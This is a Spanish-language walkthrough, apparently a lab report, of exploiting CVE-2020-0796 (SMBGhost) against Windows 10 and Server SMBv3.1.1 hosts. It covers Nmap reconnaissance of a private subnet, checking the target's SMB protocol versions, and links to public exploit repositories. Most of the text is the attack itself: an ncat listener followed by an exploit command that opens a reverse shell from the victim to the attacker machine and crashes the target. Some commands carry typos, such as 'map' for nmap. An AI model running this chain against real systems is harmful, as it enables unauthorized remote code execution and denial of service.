
Prueba de concepto del exploit para CVE-2020-0796 (SMBGhost) dirigido a Windows 10/Server SMBv3.1.1. Incluye reconocimiento con Nmap, escaneo de vulnerabilidades y entrega de payload de shell inversa.
**- Versiones afectadas*
- Windows 10 Version 1903 for 32-bit Systems
- Windows 10 Version 1903 for ARM64-based Systems
- Windows 10 Version 1903 for x64-based Systems
- Windows 10 Version 1909 for 32-bit Systems
- Windows 10 Version 1909 for ARM64-based Systems
- Windows 10 Version 1909 for x64-based Systems
- Windows Server, version 1903 (Server Core installation)
- Windows Server, version 1909 (Server Core installation)

Lanzar Nmap para escanear el rango de red en la zona DMZ
map -sS 192.168.116.0/24
nmap: Es el nombre del programa de escaneo de red**.**
-sS: Selecciona el método de escaneo TCP SYN scan. En este escaneo, Nmap envía un paquete SYN al host de destino y observa la respuesta. Si el host de destino responde con un paquete SYN-ACK, Nmap sabe que el puerto está abierto. Si el host de destino responde con un paquete RST, significa que el puerto está cerrado.
-192.168.116.0/24: La dirección IP o el rango de direcciones IP específico que desea escanear. En este caso, el rango de direcciones es 192.168.116.0/24, que describe todas las direcciones IP desde 192.168.116.1 hasta 192.168.116.254.

=> Se observa que la dirección IP de la máquina víctima 192.116.145 tiene el puerto 445 abierto.
· Usar Nmap para escanear vulnerabilidades en la máquina víctima
map -p445 –script smb-protocols 192.168.116.145
nmap: Es el nombre del programa de escaneo de red.
-p445: Especifica el puerto concreto a escanear, en este caso el puerto 445. El puerto 445 se utiliza normalmente para comunicarse con el servicio SMB (Server Message Block) en los sistemas Windows.
--script smb-protocols: Selecciona el script smb-protocols para realizar el escaneo. Este script ayuda a comprobar y mostrar información sobre las versiones del protocolo SMB compatibles en el host de destino.
192.168.116.145: La dirección IP del host que desea escanear. En este caso, la dirección IP configurada es 192.168.116.145

- El resultado obtenido con smb-protocols indica que la máquina víctima podría tener la vulnerabilidad explotable de SMBv3.1.1
- Para estar más seguros, se continúa verificando la posibilidad de explotar la vulnerabilidad CVE-2020-0796 ejecutando el script de Python
[]: -https://github.com/ly4k/SMBGhost "código de explotación"

=> Resultado Vulnerable ->: se detecta que la vulnerabilidad CVE 2020-0796 se puede explotar en la máquina víctima.
**Llevar a cabo el ataque Reverse_shell**
ncat -lvp 4444
[]: https://github.com/jamf/CVE-2020-0796-RCE-POC "código de explotación"
python SMBleedingGhost.py 192.168.116.145 192.168.44.3 4444

=> RESULTADO: La máquina atacante toma el control de la ejecución de código shell en la máquina víctima.

Tras una conexión exitosa, el atacante puede explotar y ejecutar código arbitrario en la máquina víctima con los privilegios de User del usuario de la sesión de conexión.
Al finalizar la sesión, la máquina víctima sufre un error BlueScreen y se reinicia automáticamente.

*La realización de la explotación puede provocar daños en el sistema objetivo*